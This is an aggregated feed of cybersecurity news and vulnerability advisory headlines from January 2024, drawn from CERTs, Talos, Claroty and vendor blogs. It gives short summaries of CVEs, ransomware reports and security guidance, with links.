Trail of Bits cares about internet freedom, and one of our most valued partners in pursuit of that goal is the Open Technology Fund (OTF). Our core values involve focusing on high-impact work, including work with a positive social impact. The OTF’s Red Team Lab […]

https://blog.trailofbits.com/2024/01/15/internet-freedom-with-the-open-technology-fund/
Report on the implementation of CERT.LV tasks
2024-01-15T13:29:48Z | 1705325388

The situation in the Latvian cyberspace in Q4 2023 was intense but stable. The volume of

https://cert.lv/en/2024/01/report-on-the-implementation-of-cert-lv-tasks
Finnish organisations targeted by Akira ransomware
2024-01-15T13:08:11Z | 1705324091

The National Cyber Security Centre Finland received 12 reports of Akira ransomware cases from Finnish organisations in 2023. The incidents were particularly related to weakly secured Cisco VPN implementations or their unpatched vulnerabilities. Recovery is usually hard.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-organisations-targeted-akira-ransomware
Finnish organisations targeted by Akira ransomware
2024-01-15T13:08:11Z | 1705324091

The National Cyber Security Centre Finland received 12 reports of Akira ransomware cases from Finnish organisations in 2023. The incidents were particularly related to weakly secured Cisco VPN implementations or their unpatched vulnerabilities. Recovery is usually hard.

https://www.kyberturvallisuuskeskus.fi/en/news/finnish-organisations-targeted-akira-ransomware
Several vulnerabilities in PAX payment terminals
2024-01-15T10:00:00Z | 1705312800

CERT Poland has received a report about 5 vulnerabilities found in PAX POS (Point Of Sale) devices.

https://cert.pl/en/posts/2024/01/CVE-2023-4818/
Machine Learning in Action – An In-Depth Look at Identifying Operating Systems Through a TCP/IP Based Model
2024-01-15T08:32:22Z | 1705307542

In the previous post, we’ve discussed how passive OS identification can be done based on different network protocols. We’ve also used the OSI model to categorize the different indicators and prioritize them based on reliability and granularity. In this post, we will focus on the network and transport layers and introduce a machine learning OS... The post Machine Learning in Action – An In-Depth Look at Identifying Operating Systems Through a TCP/IP Based Model  appeared first on Cato Networks.

https://www.catonetworks.com/blog/machine-learning-in-action-an-in-depth-look-at-identifying-operating-systems-through-a-tcp-ip-based-model/
Akamai?s Perspective on January?s Patch Tuesday 2024
2024-01-12T15:00:00Z | 1705071600

https://www.akamai.com/blog/security-research/2024/jan/akamai-perspective-patch-tuesday-january-2024
How to introduce Semgrep to your organization
2024-01-12T14:00:26Z | 1705068026

Semgrep, a static analysis tool for finding bugs and specific code patterns in more than 30 languages, is set apart by its ease of use, many built-in rules, and the ability to easily create custom rules. We consider it an essential automated tool for discovering security issues in a […]

https://blog.trailofbits.com/2024/01/12/how-to-introduce-semgrep-to-your-organization/
Vulnerabilities in Hongdian Router H8951-4G-ESP software
2024-01-12T09:00:00Z | 1705050000

10 vulnerabilities (from CVE-2023-49253 to CVE-2023-49262) has been found in Hongdian Router H8951-4G-ESP software.

https://cert.pl/en/posts/2024/01/CVE-2023-49253/
Security Alert (A24-01-10): Multiple Vulnerabilities in Microsoft Edge
2024-01-12T04:00:00Z | 1705032000

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Noname Security Platform Updates: 3.25 Release
2024-01-11T20:23:00Z | 1705004580

https://www.akamai.com/blog/security/2024/sep/noname-security-platform-updates-325-release
CVE-2024-21866
2024-01-11T11:16:00Z | 1704971760

CWE-209: Generation of Error Message Containing Sensitive Information The affected product responds back with an error message containing sensitive data if it receives a specific malformed request. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21866
CVE-2024-21869
2024-01-11T11:15:00Z | 1704971700

CWE-256: Plaintext Storage of a Password The affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21869
CVE-2024-21764
2024-01-11T11:14:00Z | 1704971640

CWE-798: Use of Hard-Coded Credentials The affected product uses hard-coded credentials, which may allow an attacker to connect to a specific port. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21764
CVE-2024-21794
2024-01-11T11:12:00Z | 1704971520

CWE-601: URL Redirection to Untrusted Site The affected product may allow open redirects through the login page. This may redirect users to malicious webpages. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21794
CVE-2024-22016
2024-01-11T11:11:00Z | 1704971460

CWE-732: Local Privilege Escalation Through Incorrect Permission Assignment for Critical Resource Due to improper permissions configuration, any authenticated user on the server may write directly to the Scada directory. This may allow privilege escalation. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-22016
CVE-2024-22096
2024-01-11T11:10:00Z | 1704971400

CWE-23: Relative Path Traversal By appending path traversal characters to the filename when using a specific command, an attacker can read arbitrary files from the system. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-22096
CVE-2024-21852
2024-01-11T11:07:00Z | 1704971220

CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) By utilizing a Zip Slip vulnerability in the unpacking routine, an attacker can supply a malicious configuration file to achieve remote code execution. Rapid Software did not respond to CISA's attempts at coordination. Users of Rapid SCADA are encouraged to contact Rapid Software and keep their systems up to date.

https://claroty.com/team82/disclosure-dashboard/cve-2024-21852
The vulnerability forecast for 2024
2024-01-11T10:30:00Z | 1704969000

Every year we make a prediction to the number of vulnerabilities we expect to see published by NVD. We define this as the number published between New Year’s Day in 2023 to New Year’s Eve 2023, which is not the same as CVE’s that begin with 2023 as an identifier.

https://www.first.org/blog/20240109-vulnerability-forecast-2024
The vulnerability forecast for 2024
2024-01-11T10:30:00Z | 1704969000

Every year we make a prediction to the number of vulnerabilities we expect to see published by NVD. We define this as the number published between New Year’s Day in 2023 to New Year’s Eve 2023, which is not the same as CVE’s that begin with 2023 as an identifier.

https://www.first.org/blog/20240109-vulnerability-forecast-2024
Vulnerability in Kofax Capture software
2024-01-11T09:00:00Z | 1704963600

Stored XSS vulnerability (CVE-2023-5118) has been found in Kofax Capture software.

https://cert.pl/en/posts/2024/01/CVE-2023-5118/
Vulnerability in TCExam software
2024-01-11T07:00:00Z | 1704956400

A vulnerability has been found in the TCExam open source software (CVE-2023-6554).

https://cert.pl/en/posts/2024/01/CVE-2023-6554/
High Threat Security Alert (A24-01-08): Multiple Vulnerabilities in Ivanti Products
2024-01-11T04:00:00Z | 1704945600

Ivanti released a security advisory to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-09): Multiple Vulnerabilities in Cisco Products
2024-01-11T04:00:00Z | 1704945600

Cisco released security advisories to address multiple vulnerabilities in Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Optimizing Compliance and Security: iboss Integrates with CISA’s Protective DNS for Enhanced Government Defense
2024-01-10T17:19:18Z | 1704907158

In the ever-evolving cybersecurity landscape, where threats multiply and diversify daily, government agencies find themselves in a relentless pursuit of robust protective measures. The Domain Name System (DNS), a cornerstone in network systems, has increasingly come under siege, manipulated by attackers deploying sophisticated techniques such as DNS tunneling. This amplifies the urgency for government institutions, particularly those within the U.S. Federal Government, to arm themselves with an arsenal of advanced cybersecurity defenses. The post Optimizing Compliance and Security: iboss Integrates with CISA’s Protective DNS for Enhanced Government Defense appeared first on iboss.

https://www.iboss.com/blog/government-protective-dns/
You Had Me at Hi ? Mirai-Based NoaBot Makes an Appearance
2024-01-10T15:00:00Z | 1704898800

https://www.akamai.com/blog/security-research/2024/jan/mirai-based-noabot-crypto-mining
How Edge Computing Is Transforming Healthcare
2024-01-10T14:00:00Z | 1704895200

There are myriad ways the healthcare and life sciences ecosystem benefits from edge computing. Read about the top five use cases for edge computing in healthcare.

https://www.akamai.com/blog/security/2024/jan/how-edge-computing-transforming-healthcare
Security Alert (A24-01-05): Multiple Vulnerabilities in Microsoft Products (January 2024)
2024-01-10T04:00:00Z | 1704859200

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-06): Vulnerability in Google Chrome
2024-01-10T04:00:00Z | 1704859200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-07): Vulnerability in Fortinet Products
2024-01-10T04:00:00Z | 1704859200

Fortinet released a security advisory to address a vulnerability in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
WWBN AVideo functiongetOpenGraph videoName cross-site scripting (XSS) vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1883
WWBN AVideo import.json.php temporary copy unrestricted php file upload vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1885
WWBN AVideo channelBody.php user name cross-site scripting (XSS) vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1884
WWBN AVideo checkLoginAttempts login attempt restriction bypass vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1898
WWBN AVideo aVideoEncoder.json.php chunkFile path information disclosure vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1869
WWBN AVideo salt generation insufficient entropy vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1900
WWBN AVideo userRecoverPass.php captcha validation recovery notification bypass vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1897
WWBN AVideo getLanguageFromBrowser local file inclusion vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1886
WWBN AVideo aVideoEncoderReceiveImage.json.php image upload information disclosure vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1880
WWBN AVideo userRecoverPass.php recoverPass generation insufficient entropy vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1896
WWBN AVideo image404Raw.php information disclosure vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1881
WWBN AVideo navbarMenuAndLogo.php user name cross-site scripting (XSS) vulnerability
2024-01-10T00:00:00Z | 1704844800

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1882
VulnCon 2024 - Call for Papers!
2024-01-09T16:00:00Z | 1704816000

WHEN: Monday, March 25 through Wednesday, March 27, 2024. LOCATION North Carolina State University, McKimmon Center 1101 Gorman Street Raleigh, NC, 27606 We are seeking individuals to submit abstracts for talks, panels, birds-of-a-feather sessions. Any interested persons can submit no later than January 31, 2024.

https://www.first.org/newsroom/announce/20231114
Top 10 web hacking techniques of 2023 - nominations open
2024-01-09T14:33:50Z | 1704810830

Update: The results are in! Check out the final top ten here or scroll down to view all nominations Over the last year, numerous security researchers have shared their discoveries with the community t

https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
Securing open-source infrastructure with OSTIF
2024-01-09T14:00:08Z | 1704808808

The Open Source Technology Improvement Fund (OSTIF) counters an often overlooked challenge in the open-source world: the same software projects that uphold today’s internet infrastructure are reliant on, in OSTIF’s words, a “surprisingly small group of people with a limited amount of time” for all development, testing, and maintenance. This scarcity of contributor time in […]

https://blog.trailofbits.com/2024/01/09/securing-open-source-infrastructure-with-ostif/
A Retrospective on DDoS Trends in 2023 and Actionable Strategies for 2024
2024-01-09T14:00:00Z | 1704808800

https://www.akamai.com/blog/security/2024/jan/a-retrospective-on-ddos-trends-in-2023
The National Cyber Security Centre Finland’s weekly review – 01/2024
2024-01-09T12:50:54Z | 1704804654

This week, we provide information on funding opportunities in early 2024 and review some of the most important developments in cyber security in 2023.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-012024
The National Cyber Security Centre Finland’s weekly review – 01/2024
2024-01-09T12:50:54Z | 1704804654

This week, we provide information on funding opportunities in early 2024 and review some of the most important developments in cyber security in 2023.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-012024
Traficom is preparing a recommendation on the cybersecurity risk management measures of the NIS2 directive
2024-01-09T11:50:07Z | 1704801007

The Finnish Transport and Communications Agency Traficom is preparing a recommendation regarding the risk management measures of cyber security. In the background of the recommendation is the NIS2 directive that came into force on 16 January2023 which aims at securing a common level of cyber security across the European Union.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-preparing-recommendation-cybersecurity-risk-management-measures-nis2-directive
Traficom is preparing a recommendation on the cybersecurity risk management measures of the NIS2 directive
2024-01-09T11:50:07Z | 1704801007

The Finnish Transport and Communications Agency Traficom is preparing a recommendation regarding the risk management measures of cyber security. In the background of the recommendation is the NIS2 directive that came into force on 16 January2023 which aims at securing a common level of cyber security across the European Union.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-preparing-recommendation-cybersecurity-risk-management-measures-nis2-directive
RIA korraldas IT-õpetajatele küberturbe koolituse
2024-01-09T09:03:09Z | 1704790989

4. ja 5. jaanuaril toimus RIA teaduse ja arenduse koordineerimisosakonna (TAK) eestvedamisel kutsekoolide IT-erialade õpetajatele küberturbe koolitus Hands-on Hacking Essentials (HOHE).

https://ria.ee/uudised/ria-korraldas-it-opetajatele-kuberturbe-koolituse
Aastalõpp küberruumis: tõsisemad rünnakud ja suuremad teenusekatkestused
2024-01-09T08:26:05Z | 1704788765

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et detsembris esines katkestusi mitme olulise veebiteenuse töös ning küberrünnakud tabasid muu hulgas üht katlamaja ja trükikoda, samuti teatati suurest andmelekkest.

https://ria.ee/uudised/aastalopp-kuberruumis-tosisemad-runnakud-ja-suuremad-teenusekatkestused
Vulnerability in PrestaShop Google Integrator software
2024-01-08T19:00:00Z | 1704740400

CERT Poland has received a report about a SQL injection vulnerability in the PrestaShop Google Integrator software and assigned it the number CVE-2023-6921.

https://cert.pl/en/posts/2024/01/CVE-2023-6921/
Vulnerability in TasmoAdmin software
2024-01-08T19:00:00Z | 1704740400

An open redirect vulnerability has been found in the TasmoAdmin open source software (CVE-2023-6552).

https://cert.pl/en/posts/2024/01/CVE-2023-6552/
New guidance to help small organisations use online services more securely
2024-01-08T13:05:05Z | 1704719105

How to set up online (or 'cloud') services so they're protected against common cyber attacks.

https://www.ncsc.gov.uk/blog-post/using-online-services-safely
CVE-2023-49900
2024-01-08T09:23:00Z | 1704705780

X-Rite MA-T6 Kohinoor firmware, before version v2.33, is susceptible to remote code execution due to incorrectly sanitizing user input in the SetParameter command.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49900
CVE-2023-49899
2024-01-08T09:21:00Z | 1704705660

X-Rite MA-T6 Kohinoor firmware, before version v2.33, is susceptible to unauthorized access control due to not verifying the origin of a communication channel in the device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-49899
Security Alert (A24-01-03): Multiple Vulnerabilities in Microsoft Edge
2024-01-08T04:00:00Z | 1704686400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-04): Multiple Vulnerabilities in QNAP Products
2024-01-08T04:00:00Z | 1704686400

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
GTKWave VZT LZMA_read_varint out-of-bounds write vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1811
GTKWave VZT vzt_rd_block_vch_decode times parsing integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1814
GTKWave VCD sorted bsearch arbitrary write vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1807
GTKWave FST LEB128 varint stack-based buffer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1783
GTKWave decompression OS command injection vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1786
GTKWave FST FST_BL_GEOM parsing maxhandle integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1777
GTKWave VCD var definition section out-of-bounds read vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1805
GTKWave FST fstReaderIterBlocks2 chain_table allocation integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1798
GTKWave FST fstReaderIterBlocks2 chain_table parsing heap-based buffer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1789
GTKWave FST fstReaderIterBlocks2 time_table tsec_nitems integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1792
GTKWave FST fstReaderIterBlocks2 fstWritex len heap-based buffer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1793
GTKWave FST fstReaderIterBlocks2 temp_signal_value_buf allocation integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1797
GTKWave VZT longest_len value allocation integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1816
GTKWave VZT vzt_rd_block_vch_decode dict parsing integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1815
ManageEngine OpManager uploadMib directory traversal vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
GTKWave LXT2 zlib block decompression out-of-bounds write vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1823
GTKWave LXT2 lxt2_rd_trace value elements allocation integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1821
GTKWave LXT2 num_dict_entries integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1820
GTKWave VZT vzt_rd_get_facname decompression out-of-bounds write vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1813
GTKWave VZT LZMA_Read dmem extraction out-of-bounds write vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1810
GTKWave VZT facgeometry parsing integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1812
GTKWave LXT2 facgeometry parsing integer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1818
GTKWave EVCD var len parsing improper array index validation vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1803
GTKWave FST fstReaderIterBlocks2 vesc allocation integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1790
GTKWave VZT vzt_rd_process_block autosort out-of-bounds write vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1817
GTKWave FST fstReaderIterBlocks2 VCDATA parsing heap-based buffer overflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1785
GTKWave VCD parse_valuechange portdump out-of-bounds write vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1804
GTKWave VCD get_vartoken realloc use-after-free vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1806
GTKWave LXT2 lxt2_rd_get_facname decompression out-of-bounds write vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1826
GTKWave LXT2 lxt2_rd_expand_integer_to_bits stack-based buffer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1827
GTKWave LXT2 lxt2_rd_iter_radix shift operation integer underflow vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1824
GTKWave LXT2 zlib block allocation integer overflow vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1822
GTKWave LXT2 num_time_table_entries out-of-bounds write vulnerability
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1819
GTKWave FST fstReaderIterBlocks2 tdelta improper array index validation vulnerabilities
2024-01-08T00:00:00Z | 1704672000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1791
Ransomware caused lightning strikes during November’s cyber weather
2024-01-05T12:19:47Z | 1704457187

The storms of October were left behind with the removal of the warning in November, but the late autumn cyber weather continued mostly as rainy. Especially in terms of malware and vulnerabilities, lightning was caused by several reports of ransomware detections. Cybercriminals can take advantage of the vulnerabilities that have become public fast. It's good to remember to take care of updates also at Christmas time.

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_11/2023
Ransomware caused lightning strikes during November’s cyber weather
2024-01-05T12:19:47Z | 1704457187

The storms of October were left behind with the removal of the warning in November, but the late autumn cyber weather continued mostly as rainy. Especially in terms of malware and vulnerabilities, lightning was caused by several reports of ransomware detections. Cybercriminals can take advantage of the vulnerabilities that have become public fast. It's good to remember to take care of updates also at Christmas time.

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/kybersaa_11/2023
Vulnerability in class.upload.php open source library
2024-01-04T19:00:00Z | 1704394800

Stored XSS vulnerability has been found in class.upload.php open source library (CVE-2023-6551).

https://cert.pl/en/posts/2024/01/CVE-2023-6551/
The Artemis security scanner
2024-01-04T12:00:00Z | 1704369600

Artemis is an open-source security vulnerability scanner developed by CERT PL. It is built to look for website misconfigurations and vulnerabilities on a large number of sites. It automatically prepares reports that can be sent to the affected institutions. Thanks to its modular architecture, it can be used to combine the results of various other tools in a single dashboard.

https://cert.pl/en/posts/2024/01/artemis-security-scanner/
Security Alert (A24-01-01): Multiple Vulnerabilities in Android
2024-01-04T04:00:00Z | 1704340800

Google has released Android Security Bulletin January 2024 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-01-02): Multiple Vulnerabilities in Google Chrome
2024-01-04T04:00:00Z | 1704340800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
The Path to SASE: A Project Planning Guide
2024-01-03T15:27:38Z | 1704295658

Breaking Free from Legacy Constraints Enterprises often find themselves tethered to complex and inflexible network architectures that impede their journey towards business agility and operational efficiency. Secure Access Service Edge, or SASE, a term coined by Gartner in 2019, defines a newer framework that converges enterprise networking and security point solutions into a single, secure,... The post The Path to SASE: A Project Planning Guide appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-path-to-sase-a-project-planning-guide/
CVE-2022-1471: SnakeYAML Deserialization Deep Dive
2024-01-03T00:00:00Z | 1704240000

Get an overview of SnakeYAML deserialization vulnerabilities (CVE-2022-1471) - how it works, why it works, and what it affects.

https://www.greynoise.io/blog/cve-2022-1471-snakeyaml-deserialization-deep-dive
Tag, you’re it: Signal tagging in Circom
2024-01-02T14:00:01Z | 1704204001

We at Trail of Bits perform security reviews for a seemingly endless stream of applications that use zero-knowledge (ZK) proofs. While fast new arithmetization and folding libraries like Halo2, Plonky2, and Boojum are rapidly gaining adoption, Circom remains a mainstay of ZK circuit design. We’ve written about Circom safety before in the […]

https://blog.trailofbits.com/2024/01/02/tag-youre-it-signal-tagging-in-circom/
Safeguarding Patient Health Data Means Balancing Access and Security
2024-01-02T14:00:00Z | 1704204000

Increased access to health data can leave providers and insurers vulnerable to data breaches, so it?s vital to invest in cybersecurity that can protect networks.

https://www.akamai.com/blog/security/2023/dec/safeguarding-patient-health-data-balancing-access-security
The National Cyber Security Centre Finland’s weekly review – 52/2023
2024-01-02T12:04:37Z | 1704197077

This week we will talk about the Akira ransomware that attacked Finnish organisations as well as the Kyberala murroksessa seminar. In the last weekly review of the year, we wish everyone a safe new year 2024!

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-522023
The National Cyber Security Centre Finland’s weekly review – 52/2023
2024-01-02T12:04:37Z | 1704197077

This week we will talk about the Akira ransomware that attacked Finnish organisations as well as the Kyberala murroksessa seminar. In the last weekly review of the year, we wish everyone a safe new year 2024!

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-522023
Happy New Year 2024
2024-01-01T11:40:00Z | 1704109200

Thank you to all our customers and friends for your support in 2023! The whole Joe Security family wishes you good health, satisfaction and many pleasant moments in 2024!

https://www.joesecurity.org/blog/7565252223246926936
Vulnerability in CoolKit Technology eWeLink mobile application (Android & iOS)
2023-12-29T23:00:00Z | 1703890800

CERT Poland has received a report about a vulnerability in the CoolKit Technology eWeLink mobile application (Android & iOS) and assigned it the number CVE-2023-6998.

https://cert.pl/en/posts/2023/12/CVE-2023-6998/
Billion times emptiness
2023-12-29T14:00:51Z | 1703858451

Behind Ethereum’s powerful blockchain technology lies a lesser-known challenge that blockchain developers face: the intricacies of writing robust Ethereum ABI (Application Binary Interface) parsers. Ethereum’s ABI is critical to the blockchain’s infrastructure, enabling seamless interactions between smart contracts and external applications. The complexity of data types and the need for precise encoding […]

https://blog.trailofbits.com/2023/12/29/billion-times-emptiness/
Foi publicado o Relatório do Observatório dedicado ao tema "Sociedade", edição de 2023
2023-12-28T00:00:00Z | 1703721600

O Relatório Cibersegurança em Portugal – tema Sociedade 2023 foi publicado pelo Observatório de Cibersegurança do CNCS. Este documento, que vai na sua quinta edição, analisa o estado da componente humana da cibersegurança, nomeadamente as atitudes, os comportamentos e a sensibilização e educação nesta matéria. Este estudo sintetiza dados disponibilizados por estatísticas oficiais, mas também recolhe dados considerados em falta de modo a apresentar um quadro alargado da dimensão social da cibersegurança. Grande parte da informação apresentada refere-se a 2022, mas alguma remete para 2023. Consulte o documento completo aqui. E a versão de leitura rápida aqui. Desta edição transcrevem-se de seguida algumas conclusões consideradas relevantes: A exposição dos indivíduos e das organizações ao ciberespaço aumentou em 2022 em Portugal e encontra-se acima da média da União Europeia (UE) relativamente a alguns serviços digitais críticos. Houve mais indivíduos a usar a Internet e grande parte das organizações públicas e privadas possuíam ligações de banda larga. Destaca-se um número de indivíduos significativamente acima da média da UE a usar telefonemas e videochamadas pela Internet, mensagens instantâneas e redes sociais. Em 2022, verificou-se ainda um acentuado incremento da notoriedade da cibersegurança como tema. O número de artigos nos media que mencionaram esta palavra e de pesquisas online sobre a mesma aumentou de forma assinalável face ao ano anterior. Houve mais empresas em Portugal em 2022 com Políticas de Segurança das Tecnologias da Informação e Comunicação (TIC) definidas do que a média da UE, mas menos de metade tinha documentação deste tipo. Na Administração Pública, quase dois terços dos organismos definiram uma estratégia neste domínio, mas menos do que em anos anteriores. No que diz respeito a medidas concretas, ainda que grande parte das empresas tenha afirmado usar palavras-passe seguras, menos de um terço aplicou o múltiplo fator de autenticação. Na Administração Pública, menos de metade dos organismos tinham esta medida implementada. Todavia, outras medidas foram aplicadas de forma muito generalizada na Administração Pública, como é o caso da atualização regular do software. As atividades relacionadas com a segurança das TIC foram predominantemente realizadas por fornecedores externos, quando falamos das empresas, e por pessoal interno, no âmbito da Administração Pública. Contudo, tal como em anos anteriores, a Administração Pública viu crescer a sua necessidade de competências em segurança das TIC para os níveis mais elevados dos últimos anos. Em 2022, as ações de sensibilização em cibersegurança dirigidas ao público em geral em Portugal, realizadas por organizações que assumem essa missão, ocorreram predominantemente na forma de sessões presenciais e online e de cursos online. Verificou-se também um crescimento das ações de sensibilização dirigidas a crianças e jovens. O tema mais frequente foi o da ciber-higiene em termos genéricos, embora outros temas também tenham tido uma presença importante, como a proteção de dados. Destacaram-se algumas tendências positivas no que diz respeito à realização de ações de sensibilização nas organizações dirigidas aos empregados no ano de 2022: o número de empresas a sensibilizar os seus empregados para a segurança das TIC aumentou, ocorrendo em quase dois terços das mesmas, e verificou-se um crescimento significativo no número de organismos públicos que verteram em disposições contratuais obrigações neste domínio, fixando-se em cerca de um terço da Administração Pública. Quanto ao ensino superior especializado em cibersegurança e segurança de informação, o número de cursos continuou a aumentar, com mais duas licenciaturas e um mestrado, e o número de alunos inscritos e diplomados também. Contudo, a percentagem de mulheres inscritas e diplomadas foi relativamente baixo.

https://dyn.cncs.gov.pt/pt/detalhe/art/135819/foi-publicado-o-relatorio-do-observatorio-dedicado-ao-tema-sociedade-edicao-de-2023
AI In Windows: Investigating Windows Copilot
2023-12-27T14:00:22Z | 1703685622

